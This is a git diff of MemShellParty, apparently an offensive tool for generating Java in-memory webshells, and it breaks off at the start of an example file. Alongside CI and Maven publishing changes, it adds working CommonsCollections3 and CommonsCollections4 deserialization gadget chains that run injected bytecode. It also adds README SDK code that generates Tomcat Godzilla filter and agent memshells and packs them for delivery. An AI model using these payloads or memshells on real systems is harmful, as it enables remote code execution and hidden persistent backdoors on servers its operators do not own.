diff --git a/.github/workflows/dev-deploy.yaml b/.github/workflows/dev-deploy.yaml index 2cc9929a..fe920c26 100644 --- a/.github/workflows/dev-deploy.yaml +++ b/.github/workflows/dev-deploy.yaml @@ -37,13 +37,13 @@ jobs: run: bun install --frozen-lockfile && bun run build - name: Build Boot with Gradle - run: ./gradlew -Pversion=dev :boot:bootjar -x test + run: ./gradlew :boot:bootjar -x test - name: Upload Boot Jar uses: actions/upload-artifact@v4 with: name: boot - path: boot/build/libs/boot-dev.jar + path: boot/build/libs/*.jar docker-push: name: Docker Push @@ -78,6 +78,30 @@ jobs: push: true tags: docker.io/reajason/memshell-party:dev + deploy-maven: + name: Deploy to Maven Central + needs: [ build-jar ] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Setup Java + uses: actions/setup-java@v4 + with: + distribution: 'temurin' + java-version: 17 + + - name: Setup Gradle + uses: gradle/actions/setup-gradle@v4 + + - name: Publish with Gradle + env: + ORG_GRADLE_PROJECT_mavenCentralUsername: ${{ secrets.ORG_GRADLE_PROJECT_mavenCentralUsername }} + ORG_GRADLE_PROJECT_mavenCentralPassword: ${{ secrets.ORG_GRADLE_PROJECT_mavenCentralPassword }} + ORG_GRADLE_PROJECT_signingInMemoryKey: ${{ secrets.ORG_GRADLE_PROJECT_signingInMemoryKey }} + ORG_GRADLE_PROJECT_signingInMemoryKeyId: ${{ secrets.ORG_GRADLE_PROJECT_signingInMemoryKeyId }} + ORG_GRADLE_PROJECT_signingInMemoryKeyPassword: ${{ secrets.ORG_GRADLE_PROJECT_signingInMemoryKeyPassword }} + run: ./gradlew publishAllToMavenCentral + deploy-northflank: name: Deploy to Northflank needs: [ docker-push ] diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index 75745ae0..bc4b5b16 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -35,7 +35,6 @@ jobs: build-jar: name: Build Jar runs-on: ubuntu-latest - needs: [ info ] steps: - uses: actions/checkout@v4 @@ -58,13 +57,13 @@ jobs: run: bun install --frozen-lockfile && bun run build - name: Build Boot with Gradle - run: ./gradlew -Pversion=${{ needs.info.outputs.version-without-v }} :boot:bootjar -x test + run: ./gradlew :boot:bootjar -x test - name: Upload Boot Jar uses: actions/upload-artifact@v4 with: name: boot - path: boot/build/libs/boot-${{ needs.info.outputs.version-without-v }}.jar + path: boot/build/libs/*.jar docker-push: name: Docker Push @@ -110,6 +109,29 @@ jobs: ghcr.io/reajason/memshell-party:${{ needs.info.outputs.version-without-v }} ghcr.io/reajason/memshell-party:latest + deploy-maven: + name: Deploy to Maven Central + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Setup Java + uses: actions/setup-java@v4 + with: + distribution: 'temurin' + java-version: 17 + + - name: Setup Gradle + uses: gradle/actions/setup-gradle@v4 + + - name: Publish with Gradle + env: + ORG_GRADLE_PROJECT_mavenCentralUsername: ${{ secrets.ORG_GRADLE_PROJECT_mavenCentralUsername }} + ORG_GRADLE_PROJECT_mavenCentralPassword: ${{ secrets.ORG_GRADLE_PROJECT_mavenCentralPassword }} + ORG_GRADLE_PROJECT_signingInMemoryKey: ${{ secrets.ORG_GRADLE_PROJECT_signingInMemoryKey }} + ORG_GRADLE_PROJECT_signingInMemoryKeyId: ${{ secrets.ORG_GRADLE_PROJECT_signingInMemoryKeyId }} + ORG_GRADLE_PROJECT_signingInMemoryKeyPassword: ${{ secrets.ORG_GRADLE_PROJECT_signingInMemoryKeyPassword }} + run: ./gradlew publishAllToMavenCentral + create-release: name: Create Release needs: [ info, docker-push ] @@ -125,18 +147,13 @@ jobs: name: boot path: boot/build/libs - - name: Calculate SHA-256 - id: calculate_sha256 - run: | - sha256sum boot/build/libs/boot-${{ needs.info.outputs.version-without-v }}.jar > boot/build/libs/boot-${{ needs.info.outputs.version-without-v }}.sha256 - - name: Release uses: ncipollo/release-action@v1 with: name: ${{ needs.info.outputs.version }} tag: ${{ needs.info.outputs.version }} body: ${{ needs.info.outputs.changelog }} - artifacts: boot/build/libs/boot-${{ needs.info.outputs.version-without-v }}.jar,boot/build/libs/boot-${{ needs.info.outputs.version-without-v }}.sha256 + artifacts: boot/build/libs/boot-${{ needs.info.outputs.version-without-v }}.jar deploy-northflank: name: Deploy to Northflank diff --git a/CHANGELOG.md b/CHANGELOG.md index 4fe9d206..8d292731 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,15 +5,33 @@ All notable changes to this project will be documented in this file. The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). +## [v1.7.0](https://github.com/ReaJason/MemShellParty/releases/tag/v1.7.0) - 2025-04-06 + +### Added + +- 支持发布到 MavenCentral,可通过引入依赖使用生成 API by @ReaJason(#41) +- 支持 CC3、CC4 反序列化 payload 打包方式 +- 支持随机参数生成与默认选项(#50) + +### Changed + +- 去除代码混淆相关代码 +- 为了更好地在 MavenCentral 展示,重命名部分模块 +- 使用 Jackson 代替 Fastjson 降低 boot 打包体积 +- 移除 commons-codec 降低 boot 打包体积 +- 升级 shadcn/ui 所有 component 代码 + +**Full Changelog:** [v1.6.0...v1.7.0](https://github.com/ReaJason/MemShellParty/compare/v1.6.0...v1.7.0) + ## [v1.6.0](https://github.com/ReaJason/MemShellParty/releases/tag/v1.6.0) - 2025-03-30 > 做代码生成以及代码混淆真是一件需要耐心的事情 ### Added -- 支持自定义内存马生成(#49)by @ReaJason -- 支持命令回显 ASM Agent 内存马(#51)by @ReaJason -- 支持简易的代码混淆(#13)by @ReaJason +- 支持自定义内存马生成 by @ReaJason(#49) +- 支持命令回显 ASM Agent 内存马 by @ReaJason(#51) +- 支持简易的代码混淆 by @ReaJason(#13) - 支持自动发布 DEV 分支代码 CD ### Changed diff --git a/README.md b/README.md index 0e9f9e9b..371abe14 100644 --- a/README.md +++ b/README.md @@ -71,6 +71,97 @@ docker rm -f memshell-party docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party reajason/memshell-party:latest ``` +### SDK 集成到现有工具中 + +> 适合集成到已有工具中,实现内存马 payload 的生成,支持 JDK8 以上版本,v1.7.0 开始支持 + +1. 添加依赖,Maven Or Gradle + +```xml + + + io.github.reajason + generator + 1.7.0 + +``` + +```groovy +// Gradle Repo +implementation 'io.github.reajason:generator:1.7.0' +``` + +2. 生成 Tomcat Godzilla Filter 内存马示例 + +```java +ShellConfig shellConfig = ShellConfig.builder() + .server(Server.Tomcat) + .shellTool(ShellTool.Godzilla) + .shellType(ShellType.FILTER) + .shrink(true) // 缩小字节码 + .debug(false) // 关闭调试 + .build(); + +InjectorConfig injectorConfig = InjectorConfig.builder() +// .urlPattern("/*") // 自定义 urlPattern,默认就是 /* +// .shellClassName("com.example.memshell.GodzillaShell") // 自定义内存马类名,默认为空时随机生成 +// .injectorClassName("com.example.memshell.GodzillaInjector") // 自定义注入器类名,默认为空时随机生成 + .build(); + +GodzillaConfig godzillaConfig = GodzillaConfig.builder() +// .pass("pass") +// .key("key") +// .headerName("User-Agent") +// .headerValue("test") + .build(); + +GenerateResult result = MemShellGenerator.generate(shellConfig, injectorConfig, godzillaConfig); + +System.out.println("注入器类名:"+result.getInjectorClassName()); +System.out.println("内存马类名:"+result.getShellClassName()); + +System.out.println(result.getShellConfig()); +System.out.println(result.getShellToolConfig()); + +System.out.println("Base64 打包:"+Packers.Base64.getInstance().pack(result)); +System.out.println("脚本引擎打包:"+Packers.ScriptEngine.getInstance().pack(result)); +``` +3. 生成 Tomcat Godzilla AgentFilterChain 示例 +```java +ShellConfig shellConfig = ShellConfig.builder() + .server(Server.Tomcat) + .shellTool(ShellTool.Godzilla) + .shellType(ShellType.AGENT_FILTER_CHAIN) + .shrink(true) // 缩小字节码 + .debug(false) // 关闭调试 + .build(); + +InjectorConfig injectorConfig = InjectorConfig.builder() +// .urlPattern("/*") // 自定义 urlPattern,默认就是 /* +// .shellClassName("com.example.memshell.GodzillaShell") // 自定义内存马类名,默认为空时随机生成 +// .injectorClassName("com.example.memshell.GodzillaInjector") // 自定义注入器类名,默认为空时随机生成 + .build(); + +GodzillaConfig godzillaConfig = GodzillaConfig.builder() +// .pass("pass") +// .key("key") +// .headerName("User-Agent") +// .headerValue("test") + .build(); + +GenerateResult result = MemShellGenerator.generate(shellConfig, injectorConfig, godzillaConfig); + +System.out.println("注入器类名:" + result.getInjectorClassName()); +System.out.println("内存马类名:" + result.getShellClassName()); + +System.out.println(result.getShellConfig()); +System.out.println(result.getShellToolConfig()); + +byte[] agentJarBytes = ((JarPacker) Packers.AgentJar.getInstance()).packBytes(result); +Files.write(Paths.get("agent.jar"), agentJarBytes); +``` +4. 封装统一生成接口可参考 [GeneratorController.java](boot/src/main/java/com/reajason/javaweb/boot/controller/GeneratorController.java) + ## 适配情况 已兼容 Java6 ~ Java8、Java9、Java11、Java17、Java21 diff --git a/boot/build.gradle b/boot/build.gradle index 9d5fbcec..9831ce58 100644 --- a/boot/build.gradle +++ b/boot/build.gradle @@ -48,6 +48,7 @@ dependencies { implementation('org.springframework.boot:spring-boot-starter-web') { exclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat' } + implementation 'org.apache.commons:commons-lang3:3.+' implementation 'org.springframework.boot:spring-boot-starter-undertow' compileOnly 'org.projectlombok:lombok' developmentOnly 'org.springframework.boot:spring-boot-devtools' diff --git a/boot/src/main/java/com/reajason/javaweb/boot/controller/ConfigController.java b/boot/src/main/java/com/reajason/javaweb/boot/controller/ConfigController.java index f6194a06..4f3b90d5 100644 --- a/boot/src/main/java/com/reajason/javaweb/boot/controller/ConfigController.java +++ b/boot/src/main/java/com/reajason/javaweb/boot/controller/ConfigController.java @@ -1,11 +1,9 @@ package com.reajason.javaweb.boot.controller; -import com.reajason.javaweb.boot.entity.Config; import com.reajason.javaweb.memshell.Packers; import com.reajason.javaweb.memshell.Server; import com.reajason.javaweb.memshell.ShellTool; import com.reajason.javaweb.memshell.server.AbstractShell; -import org.springframework.http.ResponseEntity; import org.springframework.web.bind.annotation.CrossOrigin; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; @@ -20,8 +18,28 @@ @RequestMapping("/config") @CrossOrigin("*") public class ConfigController { + + @RequestMapping("/servers") + public Map> getServers() { + Map> servers = new LinkedHashMap<>(); + for (Server server : Server.values()) { + if (server.getShell() != null) { + Set supportedShellTypes = server.getShell().getShellInjectorMapping().getSupportedShellTypes(); + servers.put(server.name(), supportedShellTypes.stream().toList()); + } + } + return servers; + } + + @RequestMapping("/packers") + public List getPackers() { + return Arrays.stream(Packers.values()) + .filter(packers -> packers.getParentPacker() == null) + .map(Packers::name).toList(); + } + @RequestMapping - public ResponseEntity config() { + public Map> config() { Map> coreMap = new HashMap<>(16); for (Server value : Server.values()) { AbstractShell shell = value.getShell(); @@ -38,21 +56,6 @@ public ResponseEntity config() { } coreMap.put(value.name(), map); } - Config config = new Config(); - Map> servers = new LinkedHashMap<>(); - for (Server server : Server.values()) { - if (server.getShell() != null) { - Set supportedShellTypes = server.getShell().getShellInjectorMapping().getSupportedShellTypes(); - servers.put(server.name(), supportedShellTypes.stream().toList()); - } - } - config.setServers(servers); - config.setCore(coreMap); - config.setPackers( - Arrays.stream(Packers.values()) - .filter(packers -> packers.getParentPacker() == null) - .map(Packers::name).toList() - ); - return ResponseEntity.ok(config); + return coreMap; } } \ No newline at end of file diff --git a/boot/src/main/java/com/reajason/javaweb/boot/controller/GeneratorController.java b/boot/src/main/java/com/reajason/javaweb/boot/controller/GeneratorController.java index 4132e846..623d4a64 100644 --- a/boot/src/main/java/com/reajason/javaweb/boot/controller/GeneratorController.java +++ b/boot/src/main/java/com/reajason/javaweb/boot/controller/GeneratorController.java @@ -1,8 +1,8 @@ package com.reajason.javaweb.boot.controller; -import com.reajason.javaweb.memshell.MemShellGenerator; import com.reajason.javaweb.boot.dto.GenerateRequest; import com.reajason.javaweb.boot.dto.GenerateResponse; +import com.reajason.javaweb.memshell.MemShellGenerator; import com.reajason.javaweb.memshell.config.GenerateResult; import com.reajason.javaweb.memshell.config.InjectorConfig; import com.reajason.javaweb.memshell.config.ShellConfig; @@ -10,7 +10,6 @@ import com.reajason.javaweb.memshell.packer.AggregatePacker; import com.reajason.javaweb.memshell.packer.Packer; import com.reajason.javaweb.memshell.packer.jar.JarPacker; -import org.springframework.http.ResponseEntity; import org.springframework.web.bind.annotation.*; import java.util.Base64; @@ -24,18 +23,18 @@ @CrossOrigin("*") public class GeneratorController { @PostMapping - public ResponseEntity generate(@RequestBody GenerateRequest request) { + public GenerateResponse generate(@RequestBody GenerateRequest request) { ShellConfig shellConfig = request.getShellConfig(); ShellToolConfig shellToolConfig = request.parseShellToolConfig(); InjectorConfig injectorConfig = request.getInjectorConfig(); GenerateResult generateResult = MemShellGenerator.generate(shellConfig, injectorConfig, shellToolConfig); Packer packer = request.getPacker().getInstance(); if (packer instanceof JarPacker) { - return ResponseEntity.ok(new GenerateResponse(generateResult, Base64.getEncoder().encodeToString(((JarPacker) packer).packBytes(generateResult)))); + return new GenerateResponse(generateResult, Base64.getEncoder().encodeToString(((JarPacker) packer).packBytes(generateResult))); } else if (packer instanceof AggregatePacker) { - return ResponseEntity.ok(new GenerateResponse(generateResult, ((AggregatePacker) packer).packAll(generateResult))); + return new GenerateResponse(generateResult, ((AggregatePacker) packer).packAll(generateResult)); } else { - return ResponseEntity.ok(new GenerateResponse(generateResult, packer.pack(generateResult))); + return new GenerateResponse(generateResult, packer.pack(generateResult)); } } } \ No newline at end of file diff --git a/boot/src/main/java/com/reajason/javaweb/boot/controller/VersionController.java b/boot/src/main/java/com/reajason/javaweb/boot/controller/VersionController.java index 349a1b89..a0380248 100644 --- a/boot/src/main/java/com/reajason/javaweb/boot/controller/VersionController.java +++ b/boot/src/main/java/com/reajason/javaweb/boot/controller/VersionController.java @@ -36,7 +36,7 @@ public VersionController(RestTemplate restTemplate) { @GetMapping public VersionInfo version() { - if ("dev".equals(version)) { + if (version.endsWith("-SNAPSHOT")) { return VersionInfo.builder() .currentVersion(version) .latestVersion(version).build(); diff --git a/boot/src/main/java/com/reajason/javaweb/boot/dto/GenerateRequest.java b/boot/src/main/java/com/reajason/javaweb/boot/dto/GenerateRequest.java index 5684cbcb..6dea5a30 100644 --- a/boot/src/main/java/com/reajason/javaweb/boot/dto/GenerateRequest.java +++ b/boot/src/main/java/com/reajason/javaweb/boot/dto/GenerateRequest.java @@ -2,7 +2,9 @@ import com.reajason.javaweb.memshell.Packers; import com.reajason.javaweb.memshell.config.*; +import com.reajason.javaweb.memshell.utils.CommonUtil; import lombok.Data; +import org.apache.commons.lang3.StringUtils; /** * @author ReaJason @@ -32,36 +34,36 @@ public ShellToolConfig parseShellToolConfig() { return switch (shellConfig.getShellTool()) { case Godzilla -> GodzillaConfig.builder() .shellClassName(shellToolConfig.getShellClassName()) - .pass(shellToolConfig.getGodzillaPass()) - .key(shellToolConfig.getGodzillaKey()) + .pass(StringUtils.defaultIfBlank(shellToolConfig.getGodzillaPass(), CommonUtil.getRandomString(8))) + .key(StringUtils.defaultIfBlank(shellToolConfig.getGodzillaKey(), CommonUtil.getRandomString(8))) .headerName(shellToolConfig.getHeaderName()) - .headerValue(shellToolConfig.getHeaderValue()) + .headerValue(StringUtils.defaultIfBlank(shellToolConfig.getHeaderValue(), CommonUtil.getRandomString(8))) .build(); case Behinder -> BehinderConfig.builder() .shellClassName(shellToolConfig.getShellClassName()) - .pass(shellToolConfig.getBehinderPass()) + .pass(StringUtils.defaultIfBlank(shellToolConfig.getBehinderPass(), CommonUtil.getRandomString(8))) .headerName(shellToolConfig.getHeaderName()) - .headerValue(shellToolConfig.getHeaderValue()) + .headerValue(StringUtils.defaultIfBlank(shellToolConfig.getHeaderValue(), CommonUtil.getRandomString(8))) .build(); case Command -> CommandConfig.builder() .shellClassName(shellToolConfig.getShellClassName()) - .paramName(shellToolConfig.getCommandParamName()) + .paramName(StringUtils.defaultIfBlank(shellToolConfig.getCommandParamName(), CommonUtil.getRandomString(8))) .build(); case Suo5 -> Suo5Config.builder() .shellClassName(shellToolConfig.getShellClassName()) .headerName(shellToolConfig.getHeaderName()) - .headerValue(shellToolConfig.getHeaderValue()) + .headerValue(StringUtils.defaultIfBlank(shellToolConfig.getHeaderValue(), CommonUtil.getRandomString(8))) .build(); case AntSword -> AntSwordConfig.builder() .shellClassName(shellToolConfig.getShellClassName()) - .pass(shellToolConfig.getAntSwordPass()) + .pass(StringUtils.defaultIfBlank(shellToolConfig.getAntSwordPass(), CommonUtil.getRandomString(8))) .headerName(shellToolConfig.getHeaderName()) - .headerValue(shellToolConfig.getHeaderValue()) + .headerValue(StringUtils.defaultIfBlank(shellToolConfig.getHeaderValue(), CommonUtil.getRandomString(8))) .build(); case NeoreGeorg -> NeoreGeorgConfig.builder() .shellClassName(shellToolConfig.getShellClassName()) .headerName(shellToolConfig.getHeaderName()) - .headerValue(shellToolConfig.getHeaderValue()) + .headerValue(StringUtils.defaultIfBlank(shellToolConfig.getHeaderValue(), CommonUtil.getRandomString(8))) .build(); case Custom -> CustomConfig.builder() .shellClassBase64(shellToolConfig.getShellClassBase64()) diff --git a/boot/src/test/java/com/reajason/javaweb/boot/controller/ConfigControllerIntegrationTest.java b/boot/src/test/java/com/reajason/javaweb/boot/controller/ConfigControllerIntegrationTest.java index 69d371f9..506d3dcb 100644 --- a/boot/src/test/java/com/reajason/javaweb/boot/controller/ConfigControllerIntegrationTest.java +++ b/boot/src/test/java/com/reajason/javaweb/boot/controller/ConfigControllerIntegrationTest.java @@ -1,6 +1,5 @@ package com.reajason.javaweb.boot.controller; -import com.reajason.javaweb.boot.entity.Config; import org.junit.jupiter.api.Test; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.test.context.SpringBootTest; @@ -8,6 +7,9 @@ import org.springframework.http.HttpStatus; import org.springframework.http.ResponseEntity; +import java.util.List; +import java.util.Map; + import static org.junit.jupiter.api.Assertions.assertEquals; import static org.junit.jupiter.api.Assertions.assertNotNull; @@ -24,14 +26,31 @@ public class ConfigControllerIntegrationTest { @Test public void testConfigEndpoint() { - ResponseEntity response = restTemplate.getForEntity("/config", Config.class); + ResponseEntity response = restTemplate.getForEntity("/config", Map.class); + + assertEquals(HttpStatus.OK, response.getStatusCode()); + + Map body = response.getBody(); + assertNotNull(body); + } + + @Test + public void testConfigServersEndpoint() { + ResponseEntity response = restTemplate.getForEntity("/config/servers", Map.class); + + assertEquals(HttpStatus.OK, response.getStatusCode()); + + Map body = response.getBody(); + assertNotNull(body); + } + + @Test + public void testConfigPackersEndpoint() { + ResponseEntity response = restTemplate.getForEntity("/config/packers", List.class); assertEquals(HttpStatus.OK, response.getStatusCode()); - Config config = response.getBody(); - assertNotNull(config); - assertNotNull(config.getServers()); - assertNotNull(config.getCore()); - assertNotNull(config.getPackers()); + List body = response.getBody(); + assertNotNull(body); } } \ No newline at end of file diff --git a/build.gradle b/build.gradle index a0909fe8..da0fc453 100644 --- a/build.gradle +++ b/build.gradle @@ -1,17 +1,70 @@ -version = project.getProperties().get("version") != "unspecified" ? version : '1.0.0' +import com.vanniktech.maven.publish.SonatypeHost + +version = '1.6.1-SNAPSHOT' + +buildscript { + repositories { + mavenCentral() + gradlePluginPortal() + } + dependencies { + classpath 'com.vanniktech:gradle-maven-publish-plugin:0.31.0' + classpath "io.freefair.lombok:io.freefair.lombok.gradle.plugin:8.13.1" + } +} allprojects { - if (it.name != 'bom') { + group = 'io.github.reajason' + + if (it.name != 'memshell-party-bom') { apply(plugin: 'java') apply(plugin: 'idea') apply(plugin: 'jacoco') + apply(plugin: 'io.freefair.lombok') + } + + apply(plugin: 'com.vanniktech.maven.publish') + + mavenPublishing { + publishToMavenCentral(SonatypeHost.CENTRAL_PORTAL) + signAllPublications() + coordinates("io.github.reajason", project.name, rootProject.version as String) + + pom { + name = 'MemShellParty' + description = project.description + url = 'https://github.com/ReaJason/MemShellParty' + inceptionYear = '2025' + licenses { + license { + name = 'MIT' + url = 'https://spdx.org/licenses/MIT.html' + } + } + developers { + developer { + id = 'reajason' + name = 'ReaJason' + url = "https://reajason.eu.org" + } + } + scm { + connection = 'scm:git:https://github.com/ReaJason/MemShellParty.git' + developerConnection = 'scm:git:ssh://github.com/ReaJason/MemShellParty.git' + url = 'https://github.com/ReaJason/MemShellParty' + } + } } - if (it.name != 'bom' && !it.name.startsWith("vul")) { + if (it.name != 'memshell-party-bom' && !it.name.startsWith("vul")) { dependencies { - implementation platform(project(':bom')) + implementation platform(project(':memshell-party-bom')) } } + + repositories { + mavenCentral() + } } idea { @@ -36,12 +89,31 @@ jacocoTestReport { classDirectories.from( fileTree('generator/build/classes/java/main') { excludes = [ - 'com/reajason/javaweb/memsell/**/godzilla/**', - 'com/reajason/javaweb/memsell/**/injector/**', - 'com/reajason/javaweb/memsell/**/command/**', + 'com/reajason/javaweb/memshell/**/godzilla/**', + 'com/reajason/javaweb/memshell/**/injector/**', + 'com/reajason/javaweb/memshell/**/command/**', 'com/reajason/javaweb/config/**' ] } ) } +} + +tasks.register('publishAllToMavenCentral') { + def isSnapshot = rootProject.version.toString().endsWith('-SNAPSHOT') + if (isSnapshot) { + dependsOn ':memshell-party-bom:publishAllPublicationsToMavenCentralRepository' + dependsOn ':memshell-party-common:publishAllPublicationsToMavenCentralRepository' + dependsOn ':deserialize:publishAllPublicationsToMavenCentralRepository' + dependsOn ':memshell:publishAllPublicationsToMavenCentralRepository' + dependsOn ':memshell-java8:publishAllPublicationsToMavenCentralRepository' + dependsOn ':generator:publishAllPublicationsToMavenCentralRepository' + } else { + dependsOn ':memshell-party-bom:publishAndReleaseToMavenCentral' + dependsOn ':memshell-party-common:publishAndReleaseToMavenCentral' + dependsOn ':deserialize:publishAndReleaseToMavenCentral' + dependsOn ':memshell:publishAndReleaseToMavenCentral' + dependsOn ':memshell-java8:publishAndReleaseToMavenCentral' + dependsOn ':generator:publishAndReleaseToMavenCentral' + } } \ No newline at end of file diff --git a/common/src/test/java/com/reajason/javaweb/util/ClassUtilsTest.java b/common/src/test/java/com/reajason/javaweb/util/ClassUtilsTest.java deleted file mode 100644 index 391ce81b..00000000 --- a/common/src/test/java/com/reajason/javaweb/util/ClassUtilsTest.java +++ /dev/null @@ -1,23 +0,0 @@ -package com.reajason.javaweb.util; - -import org.apache.commons.codec.binary.Base64; -import org.junit.jupiter.api.Disabled; -import org.junit.jupiter.api.Test; - -import java.io.IOException; -import java.nio.file.Files; -import java.nio.file.Paths; - -/** - * @author ReaJason - * @since 2024/12/22 - */ -class ClassUtilsTest { - - @Test - @Disabled - void testBase64() throws IOException { - byte[] bytes = Base64.decodeBase64(""); - Files.write(Paths.get("xix.class"), bytes); - } -} \ No newline at end of file diff --git a/deserialize/build.gradle b/deserialize/build.gradle index 68050e8f..24d3e795 100644 --- a/deserialize/build.gradle +++ b/deserialize/build.gradle @@ -1,15 +1,15 @@ -plugins { - id "io.freefair.lombok" version "8.11" -} - -group = 'com.reajason.javaweb' +group = 'io.github.reajason' +description = "Java deserialize payload for MemShellParty" version = rootProject.version dependencies { + implementation project(":memshell-party-common") implementation 'net.bytebuddy:byte-buddy' implementation 'com.caucho:hessian:4.0.66' - implementation 'commons-beanutils:commons-beanutils:1.9.4' + implementation 'commons-beanutils:commons-beanutils:1.9.2' + implementation 'commons-collections:commons-collections:3.2.1' + implementation 'org.apache.commons:commons-collections4:4.0' testImplementation platform('org.junit:junit-bom') testImplementation 'org.junit.jupiter:junit-jupiter' diff --git a/deserialize/src/main/java/com/reajason/javaweb/deserialize/PayloadType.java b/deserialize/src/main/java/com/reajason/javaweb/deserialize/PayloadType.java index 451f03ee..4ad84854 100644 --- a/deserialize/src/main/java/com/reajason/javaweb/deserialize/PayloadType.java +++ b/deserialize/src/main/java/com/reajason/javaweb/deserialize/PayloadType.java @@ -1,10 +1,7 @@ package com.reajason.javaweb.deserialize; import com.reajason.javaweb.deserialize.payload.hessian.XSLTScriptEngine; -import com.reajason.javaweb.deserialize.payload.java.CommonsBeanutils110; -import com.reajason.javaweb.deserialize.payload.java.CommonsBeanutils16; -import com.reajason.javaweb.deserialize.payload.java.CommonsBeanutils18; -import com.reajason.javaweb.deserialize.payload.java.CommonsBeanutils19; +import com.reajason.javaweb.deserialize.payload.java.*; import lombok.Getter; /** @@ -21,6 +18,12 @@ public enum PayloadType { CommonsBeanutils19(new CommonsBeanutils19()), CommonsBeanutils110(new CommonsBeanutils110()), + /** + * CC 链 + */ + CommonsCollections3(new CommonCollections3()), + CommonsCollections4(new CommonCollections4()), + /** * Hessian XSLT write */ diff --git a/deserialize/src/main/java/com/reajason/javaweb/deserialize/TemplateUtils.java b/deserialize/src/main/java/com/reajason/javaweb/deserialize/TemplateUtils.java index 919a6484..64403621 100644 --- a/deserialize/src/main/java/com/reajason/javaweb/deserialize/TemplateUtils.java +++ b/deserialize/src/main/java/com/reajason/javaweb/deserialize/TemplateUtils.java @@ -1,12 +1,13 @@ package com.reajason.javaweb.deserialize; +import com.reajason.javaweb.buddy.TargetJreVersionVisitorWrapper; import com.reajason.javaweb.deserialize.utils.Reflections; -import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import lombok.SneakyThrows; import net.bytebuddy.ByteBuddy; import net.bytebuddy.dynamic.DynamicType; +import net.bytebuddy.jar.asm.Opcodes; /** * @author ReaJason @@ -20,6 +21,7 @@ public static TemplatesImpl createTemplatesImpl(byte[] bytes) { byte[] fooBytes; try (DynamicType.Unloaded make = new ByteBuddy() .subclass(Object.class).name("foo") + .visit(new TargetJreVersionVisitorWrapper(Opcodes.V1_6)) .make()) { fooBytes = make.getBytes(); } diff --git a/deserialize/src/main/java/com/reajason/javaweb/deserialize/payload/java/CommonCollections3.java b/deserialize/src/main/java/com/reajason/javaweb/deserialize/payload/java/CommonCollections3.java new file mode 100644 index 00000000..d53d748b --- /dev/null +++ b/deserialize/src/main/java/com/reajason/javaweb/deserialize/payload/java/CommonCollections3.java @@ -0,0 +1,43 @@ +package com.reajason.javaweb.deserialize.payload.java; + +import com.reajason.javaweb.deserialize.Payload; +import com.reajason.javaweb.deserialize.TemplateUtils; +import com.reajason.javaweb.deserialize.utils.Reflections; +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import lombok.SneakyThrows; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.util.HashMap; +import java.util.Map; + +/** + * CC11 链 from CommonsCollections11.md + * + * @author ReaJason + * @since 2025/4/2 + */ +public class CommonCollections3 implements Payload { + + @Override + @SneakyThrows + @SuppressWarnings({"rawtypes", "unchecked"}) + public Object generate(byte[] bytes) { + TemplatesImpl templates = TemplateUtils.createTemplatesImpl(bytes); + + InvokerTransformer invokerTransformer = new InvokerTransformer("toString", null, null); + + Map innerMap = new HashMap<>(); + Map outerMap = LazyMap.decorate(innerMap, invokerTransformer); + + TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, templates); + + Map expMap = new HashMap<>(); + expMap.put(tiedMapEntry, "valueTest"); + outerMap.remove(templates); + + Reflections.setFieldValue(invokerTransformer, "iMethodName", "newTransformer"); + return expMap; + } +} diff --git a/deserialize/src/main/java/com/reajason/javaweb/deserialize/payload/java/CommonCollections4.java b/deserialize/src/main/java/com/reajason/javaweb/deserialize/payload/java/CommonCollections4.java new file mode 100644 index 00000000..866af787 --- /dev/null +++ b/deserialize/src/main/java/com/reajason/javaweb/deserialize/payload/java/CommonCollections4.java @@ -0,0 +1,39 @@ +package com.reajason.javaweb.deserialize.payload.java; + +import com.reajason.javaweb.deserialize.Payload; +import com.reajason.javaweb.deserialize.TemplateUtils; +import com.reajason.javaweb.deserialize.utils.Reflections; +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; +import lombok.SneakyThrows; +import org.apache.commons.collections4.comparators.TransformingComparator; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InstantiateTransformer; + +import javax.xml.transform.Templates; +import java.util.PriorityQueue; + +/** + * @author ReaJason + * @since 2025/4/2 + */ +public class CommonCollections4 implements Payload { + + @Override + @SneakyThrows + @SuppressWarnings({"rawtypes", "unchecked"}) + public Object generate(byte[] bytes) { + TemplatesImpl templates = TemplateUtils.createTemplatesImpl(bytes); + ChainedTransformer chain = + new ChainedTransformer( + new ConstantTransformer(TrAXFilter.class), + new InstantiateTransformer( + new Class[]{Templates.class}, new Object[]{templates})); + TransformingComparator comparator = new TransformingComparator(chain); + PriorityQueue queue = new PriorityQueue(2, comparator); + Reflections.setFieldValue(queue, "size", 2); + Reflections.setFieldValue(queue, "comparator", comparator); + return queue; + } +} diff --git a/examples/memshell-party-maven-example/pom.xml b/examples/memshell-party-maven-example/pom.xml new file mode 100644 index 00000000..44c36c0d --- /dev/null +++ b/examples/memshell-party-maven-example/pom.xml @@ -0,0 +1,25 @@ + + + 4.0.0 + + com.reajason.javaweb.maven + memshell-party-maven-example + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + io.github.reajason + generator + 1.0.4 + + + + \ No newline at end of file diff --git a/examples/memshell-party-maven-example/src/main/java/com/reajason/javaweb/Godzilla.java b/examples/memshell-party-maven-example/src/main/java/com/reajason/javaweb/Godzilla.java new file mode 100644 index 00000000..c63aff92 --- 